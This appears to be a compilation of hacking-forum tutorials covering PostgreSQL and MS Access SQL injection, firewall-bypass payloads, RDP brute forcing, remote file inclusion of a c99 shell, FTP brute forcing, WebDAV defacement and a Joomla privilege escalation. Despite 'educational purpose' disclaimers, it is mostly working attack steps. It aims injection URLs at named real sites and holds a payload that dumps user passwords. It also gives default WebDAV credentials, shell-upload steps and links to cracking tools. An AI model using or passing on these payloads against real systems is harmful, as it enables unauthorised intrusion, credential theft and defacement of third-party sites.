POSTGRE SQL Injection

NOTE:This tutorial is for educational purpose only .

well u can varify this vulnerability (as said by Net_Spy a good sql injector)
by this error
Errors
MYSQL with MYSQL
or
MS SQL with SQL
or
ORACLE with ORA
or
MS ACCESS with Jet
or
Warning: pg_exec () [function.pg-exec]

but in our case the page is blank (i think the worst case)
well some basics for it also

|| is concatenation operator in POSTGRESQL (jux like Oracle)
we can use LIMIT function here but with some addition i.e. OFFSET if results are displayed one by one

Rest is same i think jux like mysql

now column count..
column count is same like mysql, mssql and oracle
with order by clause

comments in POSTGRESQL
-- This is a standard SQL comment
/* this is
 * multiline comments syntax
 */

CASTING in POSTGRESQL
CAST ( 'string' AS type )

now lets inject the site
with order by clause we came to know that there are 8 columns in select statement before union

okay now union select * columns
here we use null like MSSQL or Oracle because we dont know the data type.. unlike php these are typed
so one by one put a string in place of null and u will see the string in web page if the column data type is nvarchar/nchar/char/varchar

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+

now for version()
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+

for database_name

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+

if this is showing only one
than
we can use limit function
like this

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
now jux increase the limit and find all other dbs
offset function show i table at a time
eg
limit 1 offset 1 =====> one database
limit 2 offset 2 =====> one database(next to first)

or

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and same increase the limit to see other databases

now enumerating table_name
this will show all tables in all databases

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+

to see only tables of current database we will use

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+

now column name
this will show all columns of all tables of all databases

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+


to see only specific table columns we will use

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
now see if 'table_name' dont work than u need to use
CHR(table_name) and this is Oracle CHR()
u cannot use hex value in postgresql query anywhere..(i've tested well u can check ur self too..)


now dumping data..
this is same like Oracle..
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+


for reference
http://www.postgresql.org/docs/8.0/static/sql-syntax.html

Tutorial By Pk Injector

Read full post »

SQL Injection 1024 Bypass

NOTE: This tutorial is for educational Purpose only.

1024 Character limit ByPass Classic Syntax

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@y:=concat(@y,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)

without simple firewall when magic quote off

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,table_name,0x3a3a3a,column_name))))x)

with simple firewall when magic quote off

(/*!00000select*/ (@y) /*!from*/ (/*!00000select*/ (@y:=0x00), (/*!00000select*/ (0) /*!from*/(information_schema./**/columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,/*!table_name*/,0x3a3a3a,/*!column_name*/))))x)

dump whole table without simple firewall

(select(@) from(select(@:=0x00) ,(select (@) from(dbname.table_name)where(@) in (@:=concat (0x20,@, username ,0x203a3a20, name ,0x203a3a20, email_id ,0x203a3a20, hash_link ,0x3c62723e))))a)

dump whole table with simple firewall

(/*!00000select*/(@) /*!from*/(/*!00000select*/(@:=0x00) ,(/*!00000select*/ (@) /*!from*/(dbname.table_name)where(@) in (@:=concat (0x20,@, column1 ,0x203a3a20, column2 ,0x203a3a20, column3 ,0x203a3a20, column4 ,0x203a3a20, column5,0x3c62723e))))a)

R=Tutorial By Pk Injector with Thnx to MakMan

Read full post »

MSAccess Sqli

NOTE:This Tutorial is for educational purpose only.
Quick Guide for MS Access Injection
Greetings to all,

Today Im gonna discuss MS Access Injection which is rare really n wiered too Smile . Hardly some web still using it.

Introduction

MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.

Default Tables Used In Access

Note: Those table name having * infront of their name, means it can be use in query.

Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship

Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
SysObjects
MSysQueries
MSysRelationships


As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain Confused it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table Smile .

Column Enumeration and Union

We will use the # for commenting the rest of the query instead of -- or /* .

Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

Above site is vuln to sql injection let's see what error we get ?

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16

Step-2

Using order by to get columns.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That's mean we have total number of columns are 34 . Let's proceed with union now.

If we are not sure about data type we can proceed with Null instead of integer .

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from MSysAccessObjects#

We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .

Most common tables are below
users
admin
administrator
login
customers
user
members
member
customer

Step-4: Getting table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#

Page load normaly that's mean we have found a valid table now let's enumerate columns .

Step-5 : Getting Columns

We will use GROUP BY and Having for example

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members group by members.id having 1=1#


Page will load with out any error now lets put "id" in place of number of column we see on our screen

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#


we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get next column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
  11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#


Page will load with out any error now lets put "now" in place of number of column we see on our screen

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3?0,31,32,33,34 from members#


we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM


Thats All guys Smile .

Special thanks to : Renorobert , N3t.Crack3R , Sho0ter

If you like this do post your comments regarding this Smile .

Tutorial By NET_Spy with Thnx to PK Injector 

Read full post »

RDP a.k.a VPS Cracking

NOTE: This tutorial is for educational perpose only .
salam 2 all
lets start how to crack RDP aka vps ....
All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS.
you can download these tools from given link or can download by searching on google easly''''
for VNC_Scanner http://www.mediafire.com/?dka5g2wurcjaugv
& for Dubrute http://www.mediafire.com/?l5l416b99bd748c

1) Download both the files from the above link.

2) Extract both the files anywhere in ur pc.

3) Open Vnc_scanner folder

4) Open the exe file called vnc_scanner_gui.exe

NOTE :> here is a point which is never explained on any forum i ever seen ....the point is that this Vnc Scaner never gives u Dialup list or country Ip list
i saw users always asking 4 this problem so will explain its solution here....
first of all
5) Select any Country.

6) Click on Get Dial List
if u will get country Ip list then u will lucky enough otherwise as i said that this feature will not work u can get any country's Ip by
going on this site & search IP range for any country

http://www.proxysecurity.com/ip-address-...y=RESERVED

see image http://postimage.org/image/6gw62kc57/

after getting ip list paste it in notpad & here u have to edit this list a bit ," -" is between ips are with extra sapce & vnc will not accept this list so replace " - " with "-" with simple - as explain in image

see iamge http://postimage.org/image/vlch3uvy7/

http://postimage.org/image/m64jueplz/

now paste that into vnc scaner's -i box & start scan as shown in snap
http://postimage.org/image/wclsahvov/

After that it will scan for VPS working ips as in figure
http://postimage.org/image/kl73r6fu7/

After Scan finished click on Start parser "this is an option in vnc_scanner as u can see in vnc scanner's pic.It will save good ips in new text file called IPs.txt in same folder where vnc_scanner placed .


Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of the hacking software called Dubrute.



1) Open Dubrute folder

2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder

3) Open the DUBrute.exe as shown in snap...
http://postimage.org/image/hwf0m94h5/

4) Click on Generation as shown in snap...
http://postimage.org/image/nw541x1gv/

1st click on File ip then select the text file called IPs.txt which u have already in ur vnc_scanner folder..

2nd u need to put a txt file for user names ....
put some user name like
admin
root
user
etc
in notepad & save it then select this txt file.

3rd u need a password txt file also ....u can also put some common passes is a notepad & save it as password list then select this password list as in figure's 3rd option...

Now press Start in ur Dubrute.



Let it brute the combinations.When a working VPS which match IP , Username and Pass , it would be saved in Dubrute folder File called good.txt
http://postimage.org/image/m76gevah3/
In this Image shows that I found 3 VPS which is working.
after getting working vps open "Remote Desktop Conection" in ur pc & enter the ip then it will ask for user & pass enter login detail .......u will be redirected to remote pc .


thats all 1 more thing may b ur AV detect these 2 cracking files a virus so ignore it....

if u get any problem then feel free to contact me here in madleets or on FB https://www.facebook.com/mindfreakzzz

regards
gujjar haxor (pcp)

Read full post »

RFI (Remote File Inclusion) Website Hacking Tutorial

NOTE:* this tutorial is for educational purpose only .to get concept of RFi attack.


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:Code execution on the web serverCode execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).Denial of Service (DoS)Data Theft/Manipulation
www.targetsite.com/index.php?page=www.google.com
www.targetsite.com/index.php?page=www.google.com
http://www.target.com/v2/index.php?page=http://www.google.com
http://www.target.com/v2/index.php?page=http://www.google.com
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell ishttp://www.sh3ll.org/c99.txt?
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell ishttp://www.sh3ll.org/c99.txt?
http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
Regards

Lets Start 

1st Step : Find a Vunerable websites using Google Dork

some dork for searching a RFI Vuln website

“inurl:index.php?page=” its Most Popular Dork of RFI hacking

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

see example of this website  http://www.cbspk.com

So the hacker url will become

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

http://www.sh3ll.org/c99.zip

The hacker would first upload the shells to a webhosting site such as ripway.com,viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the following command to gain access

Don't Forget To  add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Read full post »

Hack FTP password by useing Brute Force Attack

NOTE:this Tutorial is for educational purpose to under stand then FTP password cracking ,so Put a secure & complex password for your FTP.

FTP is an application or service or protocol which can be used to transfer files from one place to another place ,it really comes very handy during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

What is Brute-Force?

Brute-force is a type of attack in which every possible combination of letters, digits and special characters are tried until the right password is matched with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….
Requirements:

1. The tool we will be using ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
2. You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type your desire target ,select wordlist and select “FTP” from the drop down menu and click start. If you are confused then follow the image below.


Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.
Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.

Read full post »

Webdav Hacking & Defacing Detailed Tutorial

NOTE:this tutorial is for educational purpose only.
Hi Guys !
Today i will explain you how to hack & deface webdav sites.
Is really easy , and this tutorial will clearly show you how to do it.
 Let's start...

Open up the 'Map Network Drive'
- Windows XP : Right click on My Computer
Windows 7 : Click the start bar
Now it will show a new little window.
Click on 'Sign up for online storage of conect to a network server'
A new window will show up , click next.
Again click next.
Now here type in the server's IP or domain that has WebDav enabled.
Ensure to put http:// and the webdav's directory. Otherwise it may not work. Then click next.
Now you'll get a login prompt. Login with these credentials :
User name : wampp
Password : xampp
And click OK.
At the next window you can choose whatever you want. But i prefer leaving it's default name. It's not important. Then click Next again.
Here is the last window , be sure to tick the checkbox 'Open this network place when I click Finish.'
And click Finish !
Now you'll get again the prompt , just login with the same credentials i mentioned before.

And Voila! , we have access on uploading files now. Just grab and drag with the cursor there an ASPX\ PHP shell (if it's accepts), a index html file or simply a text file.
Then go to your browser and navigate to http://yourslave/webdav/shell.php (replace shell.php with your shell's name). And you'll get access to its server.

Read full post »

Joomla Privilege Escalation Vulnerability

NOTE:This tutorial is for educational purpose to secure your joomla & update it.

salam 2 allGUJJAR(PCP) is hereim going to show u a demo of joomla user Privilege Escalation Although it is an old exploit .. but purpose of sharing is to clear concepts of beginners .. i made this video for madleets & specialy for AZ Sniffer(pcp)google Dork:inurl:index.php/component/users/?view=registrationvalue to put in source ...<input name="jform[groups][]" value="7">watch video here

https://www.youtube.com/watch?v=fLHvseOrZ2M

Regards Gujjar(pcp)

Read full post »